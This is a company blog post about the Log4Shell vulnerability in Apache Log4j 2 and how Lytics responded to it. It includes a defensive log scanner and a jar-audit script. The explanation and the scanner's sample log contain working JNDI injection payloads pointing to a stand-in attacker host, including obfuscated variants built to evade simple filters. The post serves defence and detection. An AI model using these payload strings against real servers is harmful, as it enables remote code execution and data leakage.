Our response to Log4Shell: Lytics systems and customer data uncompromised
December 15, 2021

By now you’ve probably heard more about Log4j this week than you ever have before.
On December 9, 2021, the Log4Shell vulnerability (CVE-2021-44228) in Apache Log4j 2 was publicly disclosed; the National Vulnerability Database rates it at the maximum CVSS score of 10.0, and some security experts call it the most critical vulnerability of the last decade (a pretty impressive feat, considering that the last decade also produced Heartbleed, Shellshock, and the EternalBlue exploit behind WannaCry).
Most of the software world has been quick to mitigate, thanks in large part to swift guidance from the Apache Log4j project and agencies such as CISA. Lytics was among those to act immediately. Our current internal auditing shows that neither Lytics systems nor customer data were compromised.
For the more inquisitive reader, the rest of this post explains what the vulnerability is and how we responded.
What is Log4j?
Log4j is a logging library distributed by the Apache Software Foundation, the same people responsible for great technologies like the Apache HTTP Server, Hadoop, Cassandra, Avro and many, many more. Developers use Log4j to record diagnostic information from their applications, which helps them build and operate more reliable software. Log4Shell affects the Log4j 2 line, versions 2.0-beta9 through 2.14.1.
Who has been impacted by Log4j?
A lot of organizations and a lot of technologies: any Java application that logs attacker-controlled input (a web request header, a username, a search query) through an affected Log4j 2 version is exposed, including applications that pull Log4j in only indirectly, as a dependency of another library.
What did the vulnerability expose?
Log4j 2 expands lookup expressions of the form ${...} inside the messages it logs. One of those lookups, ${jndi:...}, makes the Java runtime perform a JNDI request (over LDAP, RMI, DNS and similar protocols) to a server named in the string. An attacker who can get a string such as ${jndi:ldap://attacker.example/x} into any logged field, for example an HTTP User-Agent header or a username, can therefore make the vulnerable server contact a host they control, and in the LDAP and RMI cases load and execute an attacker-supplied Java class: remote code execution from a single log line. Even where code execution is blocked, the outbound request can leak information such as environment variables through the hostname it resolves. Because the attack is that simple and Log4j is that widespread, hackers launched an estimated 1.2 million attack attempts in the first days after disclosure, ranging from cryptojacking to botnet recruitment.
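The lookup mechanism described above is also what defenders were searching their logs for in those first days. The scanner below is an added example, not Lytics code: it approximates Log4j's innermost-first lookup expansion before matching, so the nested-lookup tricks attackers used to hide the jndi keyword (${lower:j}, ${::-j}, ${env:NOPE:-j}) are caught along with the plain form. The access-log lines, the 203.0.113.9 address and the function names are all constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in untrusted log input.

Added example for this post, not Lytics code. Log4j 2 substitutes ${...}
lookups inside logged messages, innermost first, and attackers hide the
"jndi" keyword behind nested lookups such as ${lower:j} or ${::-j}.
Only the lookups commonly used for evasion are modelled (lower, upper,
default values); any other lookup is left as literal text, which is also
what Log4j does with a lookup it cannot resolve.
"""
import re

# An innermost ${...} lookup: a body with no nested braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")

# A fully normalised JNDI lookup: ${jndi:<scheme>:<rest>}.
_JNDI = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):([^}]*)\}", re.IGNORECASE)


def _resolve_one(m):
    """Resolve one innermost lookup roughly as Log4j 2's StrSubstitutor would.

    ${lower:X} / ${upper:X}   -> case-converted X
    ${prefix:key:-default}    -> default (env/sys/... treated as unset)
    ${::-X}                   -> X (empty prefix and key, default X)
    ${jndi:...}               -> kept verbatim; this is what we are hunting
    anything else             -> kept verbatim (unresolvable)
    """
    body = m.group(1)
    var, has_default, default = body.partition(":-")
    prefix, _, key = var.partition(":")
    prefix = prefix.lower()  # Log4j matches lookup prefixes case-insensitively
    if prefix == "jndi":
        return m.group(0)
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if has_default:
        return default
    return m.group(0)


def normalize_lookups(text, max_rounds=16):
    """Expand innermost lookups until nothing changes (bounded to stay safe)."""
    for _ in range(max_rounds):
        expanded = _INNER.sub(_resolve_one, text)
        if expanded == text:
            break
        text = expanded
    return text


def scan_lines(lines):
    """Return (line_number, scheme, normalised lookup) for each JNDI lookup found."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalised = normalize_lookups(line)
        for m in _JNDI.finditer(normalised):
            hits.append((number, m.group(1).lower(), m.group(0)))
    return hits


# Constructed web-server access log lines with payloads in the User-Agent
# and request path; 203.0.113.9 is a documentation address, not a real host.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:21:03:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:21:03:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:21:03:13 +0000] "GET /${${lower:j}ndi:${lower:l}dap://203.0.113.9/x} HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.9 - - [10/Dec/2021:21:03:14 +0000] "GET / HTTP/1.1" 200 612 "-" "${j${::-n}di:${env:NOPE:-r}mi://203.0.113.9/y}"',
    '10.0.0.3 - - [10/Dec/2021:21:03:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12 "-" "-"',
]

if __name__ == "__main__":
    for number, scheme, lookup in scan_lines(SAMPLE_LOG):
        print(f"line {number}: jndi scheme={scheme} lookup={lookup}")
```

Normalising first is the point: a rule that only matches the literal text "jndi:" misses lines 3 and 4 of the sample, while this scanner reports all three payloads with their resolved scheme (ldap, ldap, rmi) and ignores the harmless ${date:yyyy} on the last line.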
What did we do about it?
Lytics’ only exposure to Log4Shell comes through Elasticsearch, the database whose flexible indexing powers our segmentation engine. Fortunately, the Elasticsearch version we run already had mitigations in place: Elasticsearch runs under the Java Security Manager, which blocks the remote class loading that turns a JNDI lookup into code execution, so we were not vulnerable to remote code execution (an outbound DNS request triggered by a lookup, and the small information leak that comes with it, remained possible on unmitigated nodes, which is one reason we did not stop there). We still quickly applied the additional mitigations recommended upstream by Elastic, in case related vulnerabilities that are not yet public exist. We continue to monitor for any additional actions required on our part and will treat them as the highest priority.
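One way to verify that a host no longer ships an exposed log4j-core, written as an added example for this post rather than Lytics' or Elastic's own tooling: Elastic's guidance at the time was to set the log4j2.formatMsgNoLookups JVM option and then move to the fixed releases (7.16.1 and 6.8.21), which remove the JndiLookup class from the bundled log4j-core, and Apache offered deleting that class as a stopgap for anyone who could not upgrade. The script below audits a directory tree of archives for exactly that, descending into nested archives because wars and fat jars bundle log4j-core inside. The jars it scans are constructed stand-ins written by build_sample_tree(), the version floors are taken from the December 2021 advisories and should be treated as assumptions to keep current, and the path labels are invented for the example.

```python
"""Audit Java archives for an exposed Log4j 2 JndiLookup class.

Added example for this post, not Lytics or Elastic code. Deleting
org/apache/logging/log4j/core/lookup/JndiLookup.class from log4j-core was the
upstream stopgap for hosts that could not upgrade at once, and fixed releases
carry a higher Implementation-Version in the jar manifest. This walks a
directory, descends into nested archives and reports each log4j-core found.
build_sample_tree() writes constructed stand-in jars so the audit runs offline.
"""
import io, os, re, tempfile, zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"
ARCHIVES = (".jar", ".war", ".ear", ".zip")
# 2.16.0 (2.12.2 on the Java 7 branch) disabled JNDI by default and closed
# CVE-2021-44228/-45046; later advisories raised this floor, so keep it current.
FIXED_FLOOR, FIXED_FLOOR_212 = (2, 16, 0), (2, 12, 2)

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9); missing -> None."""
    if not text:
        return None
    parts = [int(x) for x in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def is_fixed(version):
    """True when log4j-core at this version is safe even with JndiLookup present."""
    if version is None:
        return False  # unknown version: assume the worst
    return version >= (FIXED_FLOOR_212 if version[:2] == (2, 12) else FIXED_FLOOR)

def _manifest_version(zf):
    if "META-INF/MANIFEST.MF" not in zf.namelist():
        return None
    for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None

def audit_archive(data, label):
    """Inspect one archive (bytes) and every archive nested inside it."""
    findings = []
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return findings  # corrupt or not a zip: nothing to inspect
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if any(n.startswith(CORE_PREFIX) for n in names):
            version = parse_version(_manifest_version(zf))
            present = JNDI_CLASS in names
            findings.append({"path": label, "version": version,
                             "jndi_lookup_present": present,
                             "vulnerable": present and not is_fixed(version)})
        for n in names:  # recurse into WEB-INF/lib, BOOT-INF/lib and the like
            if n.lower().endswith(ARCHIVES):
                findings.extend(audit_archive(zf.read(n), f"{label}!{n}"))
    return findings

def audit_tree(root):
    """Audit every archive under root; paths are reported relative to root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVES):
                full = os.path.join(dirpath, name)
                label = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, "rb") as fh:
                    findings.extend(audit_archive(fh.read(), label))
    return sorted(findings, key=lambda f: f["path"])

def _fake_log4j_core(version, with_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar: manifest plus class stubs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        zf.writestr(CORE_PREFIX + "LoggerContext.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def build_sample_tree():
    """Temp dir of constructed archives: exposed, upgraded, stripped, nested in a war, unrelated."""
    root = tempfile.mkdtemp(prefix="log4j-audit-")
    os.makedirs(os.path.join(root, "lib"))
    war, other = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.11.1.jar", _fake_log4j_core("2.11.1"))
    with zipfile.ZipFile(other, "w") as zf:
        zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
    files = {"lib/log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1"),
             "lib/log4j-core-2.16.0.jar": _fake_log4j_core("2.16.0"),
             "lib/log4j-core-2.14.1-stripped.jar": _fake_log4j_core("2.14.1", False),
             "lib/unrelated.jar": other.getvalue(),
             "app.war": war.getvalue()}
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for f in audit_tree(build_sample_tree()):
        print(f"{f['path']}: version={f['version']} jndi={f['jndi_lookup_present']} "
              f"vulnerable={f['vulnerable']}")
```

Two of the four log4j-core copies in the sample tree are flagged: the 2.14.1 jar with the class still inside, and the 2.11.1 jar hidden in app.war that a shallow file listing would never show. The stripped 2.14.1 jar and the 2.16.0 jar pass, and an unknown version with the class present is reported as vulnerable rather than silently skipped.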
If you have any questions regarding the security of your data, please don’t hesitate to contact your Lytics account manager.